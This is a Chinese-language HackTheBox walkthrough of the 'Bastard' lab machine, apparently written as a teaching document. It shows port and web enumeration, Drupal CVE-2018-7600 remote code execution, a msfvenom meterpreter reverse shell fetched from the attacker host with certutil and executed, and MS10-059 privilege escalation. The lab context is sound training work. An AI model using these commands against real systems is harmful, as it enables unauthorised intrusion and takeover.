HackTheBox:Bastard 记录
字数 977 2025-08-18 11:35:59
HackTheBox: Bastard 靶机渗透教学文档
0x00 环境准备
- 靶机IP: 10.10.10.9
- 攻击机IP: 10.10.16.4 (Kali Linux)
- 网络连接: 通过HackTheBox提供的VPN代理连接
0x01 信息收集阶段
端口扫描
-
TCP全端口扫描:
sudo nmap --min-rate 10000 -p- 10.10.10.9发现开放端口: 80, 135, 49154
-
UDP端口扫描:
sudo nmap -sU --min-rate 10000 -p- 10.10.10.9(此靶机未发现可利用UDP服务)
-
详细服务扫描:
sudo nmap -sT -sV -O -p80,135,49154 10.10.10.9确定80端口运行HTTP服务
-
漏洞脚本扫描:
sudo nmap --script=vuln -p80,135,49154 10.10.10.9
Web信息收集
-
Web技术识别:
whatweb http://10.10.10.9识别出Drupal CMS
-
目录扫描:
gobuster dir --url http://10.10.10.9/ -x txt,html,sql,zip,rar -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt可尝试手动检查
/robots.txt等常见路径 -
版本识别:
curl -s http://10.10.10.9/CHANGELOG.txt | grep -m2 ""确认Drupal版本为7.54
0x02 漏洞利用
Drupal RCE漏洞(CVE-2018-7600)
-
漏洞验证:
- 使用公开的Drupal 7.x RCE漏洞利用脚本
- 验证命令执行:
确认系统架构为64位Windowspython3 drupa7-CVE-2018-7600.py -c="wmic OS get OSArchitecture" http://10.10.10.9/
-
生成反弹shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=10.10.16.4 LPORT=4444 -f exe >> l7.exe -
设置HTTP服务传输payload:
python3 -m http.server 80 -
靶机下载并执行payload:
python3 drupa7-CVE-2018-7600.py -c="certutil.exe -urlcache -split -f http://10.10.16.4/l7.exe l7.exe" http://10.10.10.9/ python3 drupa7-CVE-2018-7600.py -c="l7.exe" http://10.10.10.9/ -
Metasploit监听:
msfconsole use multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.10.16.4 set LPORT 4444 run
0x03 权限提升
本地漏洞利用
-
自动漏洞建议:
run post/multi/recon/local_exploit_suggester或手动尝试已知漏洞
-
使用MS10-059漏洞提权:
- 下载漏洞利用程序:
wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe - 上传至靶机(方法同上)
- 执行提权操作
- 下载漏洞利用程序:
-
获取flag:
- 用户flag:
C:\Users\user\Desktop\user.txt - 系统flag:
C:\Users\Administrator\Desktop\root.txt
- 用户flag:
关键点总结
-
信息收集要全面:
- 不要忽略UDP扫描
- Web技术识别和版本确认至关重要
-
漏洞利用注意事项:
- Drupal 7.54存在多个RCE漏洞
- 命令执行时要考虑Windows环境特性
- 反弹shell路径要正确
-
权限提升技巧:
- Windows系统常见提权漏洞MS10-059
- 使用Metasploit的local_exploit_suggester模块辅助
-
问题解决:
- 遇到php-curl错误可尝试:
sudo apt-get install php-curl - 执行路径问题要注意当前工作目录
- 遇到php-curl错误可尝试: